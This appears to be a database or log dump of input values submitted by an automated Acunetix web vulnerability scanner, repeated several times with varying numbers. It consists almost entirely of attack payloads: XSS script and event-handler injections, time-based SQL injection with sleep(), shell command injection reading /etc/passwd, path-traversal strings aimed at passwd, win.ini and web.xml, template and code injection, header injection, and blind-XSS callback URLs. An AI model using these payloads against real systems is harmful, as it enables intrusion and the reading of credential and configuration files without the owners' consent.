1<div style=width:expression(prompt(967383))>

1

1

WEB-INF\web.xml

`cat /etc/passwd`

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<iframe src='data:text/html

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100427+99071}

1

1

1

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n928356=v985628

1

1

1some_inexistent_file_with_long_name%00.jpg

1<body onload=prompt(958210)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(974379)>

1

)

1

"|"ld

-1)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(997802)>

testasp.vulnweb.com

1

/etc/passwd

-1))

1

1

1<img/src=">" onerror=alert(912253)>

1

'

^(#$!@#$)(()))******

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

aAt9KCz3'

1

1<ScRiPt%20>prompt(905572)</sCripT>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

1

1&lt

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

BP2fen80')

1

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hit051qvva19f.bxss.me/

rKDb2hvA'))

||cat /etc/passwd

\xf6<img acu onmouseover=prompt(902776) //\xf6>

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

1<input autofocus onfocus=prompt(946528)>

1

-1

&dir

<a href='http://www.acunetix.com'>website security</a>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

1

file:///etc/passwd

http://www.acunetix.tst

'&dir&'

-1)

1

[url=http://www.acunetix.com]website security[/url]

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1_kVElH <ScRiPt >prompt(987507)</ScRiPt>

"&dir&"

-1))

<!--

1

1

1'"()&%<ScRiPt >prompt(945446)</ScRiPt>

1

1

1

xWrfSVEl'

1

WEB-INF/web.xml

|dir

1

1

'"()&%<ScRiPt >prompt(932856)</ScRiPt>

1

1

0gT15VRH')

1

WEB-INF\web.xml

'|dir

1

1

7p7VCJbZ'))

1_902417

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

acu4363\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4363

1

acux5146\xc0\xbez1\xc0\xbcz2a\x90bcxuca5146

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(911920)</ScRiPt>

1<script>prompt(968406)</script>

1

1

response.write(9654561*9635254)

1

WEB-INF/web.xml

1<ScRiPt >prompt(932803)</ScRiPt>

1

1

'+response.write(9654561*9635254)+'

WEB-INF\web.xml

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915056></ScRiPt>

"+response.write(9654561*9635254)+"

1

1

&cat /etc/passwd&

1

1<ScRiPt >prompt(996545)</ScRiPt>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<video><source onerror="javascript:prompt(988602)">

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963281)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<div style=width:expression(prompt(959031))>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1<iframe src='data:text/html

-1

1

1

${99548+99839}

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<body onload=prompt(977574)>

1

1

1

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977726)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

-1))

1

)

1

1&n982508=v965665

1<img src=xyz OnErRor=prompt(934051)>

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

UXAP6Pr0'

1

1<img/src=">" onerror=alert(958407)>

1

1

!(()&&!|*|*|

bvKpMtuQ')

"|"ld

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

y9BNm5K1'))

1

1<ScRiPt%20>prompt(951115)</sCripT>

1

-1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1&lt

'"()

-1)

'

/etc/passwd

'

1

1

1

1

\xf6<img acu onmouseover=prompt(945103) //\xf6>

-1))

"

1

1

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitBi1elGDAkx.bxss.me/

1<input autofocus onfocus=prompt(970534)>

${@print(md5(acunetix_wvs_security_test))}

1

1

DECZ64o6'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

pPMYzA8C')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

[url=http://www.acunetix.com]website security[/url]

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

comments

q8UnwUBi'))

1

1

1

1_0GzwY <ScRiPt >prompt(976151)</ScRiPt>

1

comments

1

'&dir&'

'"

1

1

1'"()&%<ScRiPt >prompt(996682)</ScRiPt>

1

comments/.

"&dir&"

<!--

file:///etc/passwd

1

1

1

1

1

|dir

'"()&%<ScRiPt >prompt(932162)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'|dir

1

1

1

1_913455

1

WEB-INF/web.xml

1

"|dir

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2474\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2474

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux10795\xc0\xbez1\xc0\xbcz2a\x90bcxuca10795

1

1

1<ScRiPt >prompt(900782)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(923619)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(904294)</ScRiPt>

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938054></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9053116*9126881)

1

1

1<ScRiPt >prompt(905459)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9053116*9126881)+'

&cat /etc/passwd&

1

"+response.write(9053116*9126881)+"

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(924552)">

1

1

WEB-INF/web.xml

"&cat /etc/passwd&"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951499)"></g></svg>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

WEB-INF\web.xml

1<div style=width:expression(prompt(969599))>

SomeCustomInjectedHeader:injected_by_wvs

${99029+99652}

1

1

1

1<iframe src='data:text/html

1

1

`cat /etc/passwd`

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(934568)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1&n975356=v917447

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920521)>

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1<img src=xyz OnErRor=prompt(976234)>

!(()&&!|*|*|

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(952464)>

-1))

'

1

testasp.vulnweb.com

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

LFhAB6Rt'

1<ScRiPt%20>prompt(913901)</sCripT>

1

1

'

1

1

1

1&lt

/etc/passwd

1

kD5V5cSZ')

${@print(md5(acunetix_wvs_security_test))}

1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

yvIb0QHX'))

\xf6<img acu onmouseover=prompt(927263) //\xf6>

1

||cat /etc/passwd

http://hitVwqt5cheQA.bxss.me/

acunetix_wvs_invalid_filename

1

1

1<input autofocus onfocus=prompt(966582)>

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

&dir

comments

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

1

comments

http://www.acunetix.tst

1_CiISn <ScRiPt >prompt(956503)</ScRiPt>

1

'"

-1))

1

1

"&dir&"

comments/.

1

1

foxbhOb5'

file:///etc/passwd

<!--

1'"()&%<ScRiPt >prompt(974234)</ScRiPt>

1

|dir

1

1

1

1

RDvMHmnu')

'"()&%<ScRiPt >prompt(959874)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

oFRIlzLL'))

1

1

1

WEB-INF/web.xml

1

1_951985

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

acu8247\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8247

../../../../../../../../../../windows/win.ini.jpg

1

1

acux9252\xc0\xbez1\xc0\xbcz2a\x90bcxuca9252

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(958619)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(911864)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(974588)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?924645></ScRiPt>

response.write(9433178*9385516)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(920689)</ScRiPt>

1

1

'+response.write(9433178*9385516)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1

1<video><source onerror="javascript:prompt(926136)">

"+response.write(9433178*9385516)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922115)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

"&cat /etc/passwd&"

1

1

1

1<div style=width:expression(prompt(901406))>

1

cat /etc/passwd

1

WEB-INF\web.xml

1<iframe src='data:text/html

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(911563)>

${99154+99106}

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977561)>